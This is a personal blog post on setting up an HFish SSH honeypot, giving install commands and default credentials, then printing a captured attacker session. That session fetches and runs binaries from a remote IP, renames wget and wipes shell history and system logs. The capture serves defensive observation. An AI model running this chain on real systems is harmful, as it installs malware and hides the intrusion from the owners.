K7

K7Blog

须知少年凌云志 曾许人间第一流.
proton
telegram

Set up an hfish honeypot to receive attacks from the entire network.

Every time a new server is opened, it will be subjected to SSH brute force attacks from weak passwords from Jiangsu Lianyungang and other overseas IP addresses. I am very curious about what actions these people will take after successfully logging into my server, so I set up an hfish honeypot to receive their attacks!

Setup Tutorial:#

Official deployment tutorial: https://hfish.net/#/2-2-linux

CentOS is the main development and testing system of the HFish team, and it is recommended to use CentOS to deploy the management end

If the deployment environment is Linux and can access the Internet, it is strongly recommended to use a one-click deployment script for installation and configuration. Before using the one-click script, please configure the firewall.

If the honeypot node is exposed to the Internet, there may be a limit of 1024 maximum TCP connections, which may cause other connections to be rejected. You can manually increase the maximum TCP connections of the machine. Refer to the solution link: https://www.cnblogs.com/lemon-flm/p/7975812.html

Run the following commands with root privileges to configure the firewall to open TCP/4433 and TCP/4434

firewall-cmd --add-port=4433/tcp --permanent   # (Used for web interface startup)
firewall-cmd --add-port=4434/tcp --permanent   # (Used for communication between nodes and management ends)
firewall-cmd --reload

If the honeypot service needs to occupy other ports in the future, the same command can be used to open them.

Run the following one-click deployment command with root privileges

bash <(curl -sS -L https://hfish.net/webinstall.sh)

After the installation is complete, log in using the following URL, account, and password

Login link: https://[ip]:4433/web/
Username: admin
Password: HFish2021

My Honeypot:#

I am using a high-interaction SSH honeypot here, which is different from a regular SSH honeypot in that it has more interactive features and executes more commands. And any password can log in successfully.

Snipaste_2024-02-09_12-15-31

Among them, I captured an SSH command execution from an overseas IP, but I haven't captured any others successfully yet!

New connection: 167.88.165.28:35180 (*****:22) [session: a58f59899b0d]
Remote SSH version: SSH-2.0-PUTTY
login attempt [root/123456a] succeeded
wdir="/bin"; for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"; do; if [ -w $i ]; then; wdir=$i; break; fi; done; cd $wdir; curl http://169.239.130.34/1.txt -o ygljglkjgfg0; chmod +x ygljglkjgfg0; ./ygljglkjgfg0; wget http://169.239.130.34/1.txt -O ygljglkjgfg1; chmod +x ygljglkjgfg1; ./ygljglkjgfg1; good http://169.239.130.34/1.txt -O ygljglkjgfg2; chmod +x ygljglkjgfg2; ./ygljglkjgfg2; sleep 2; wget http://169.239.130.34/2.txt -O sdf3fslsdf13; chmod +x sdf3fslsdf13; ./sdf3fslsdf13; good http://169.239.130.34/2.txt -O sdf3fslsdf14; chmod +x sdf3fslsdf14; ./sdf3fslsdf14; curl http://169.239.130.34/2.txt -o sdf3fslsdf15; chmod +x sdf3fslsdf15; ./sdf3fslsdf15; sleep 2; mv /usr/bin/wget /usr/bin/good; mv /bin/wget /bin/good; cat /dev/null >/root/.bash_history; cat /dev/null > /var/log/wtmp; cat /dev/null > /var/log/btmp; cat /dev/null > /var/log/lastlog; cat /dev/null > /var/log/secure; cat /dev/null > /var/log/boot.log; cat /dev/null > /var/log/cron; cat /dev/null > /var/log/dmesg; cat /dev/null > /var/log/firewalld; cat /dev/null > /var/log/maillog; cat /dev/null > /var/log/messages; cat /dev/null > /var/log/spooler; cat /dev/null > /var/log/syslog; cat /dev/null > /var/log/tallylog; cat /dev/null > /var/log/yum.log; cat /dev/null >/root/.bash_history; ls -la /etc/daemon.cfg; exit $?; ; ; 
ls -la /etc/daemon.cfg
Connection lost after 10 seconds

I really don't understand why this idiot added an SSH key for me and changed my root password. I will continue to monitor for further actions!

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.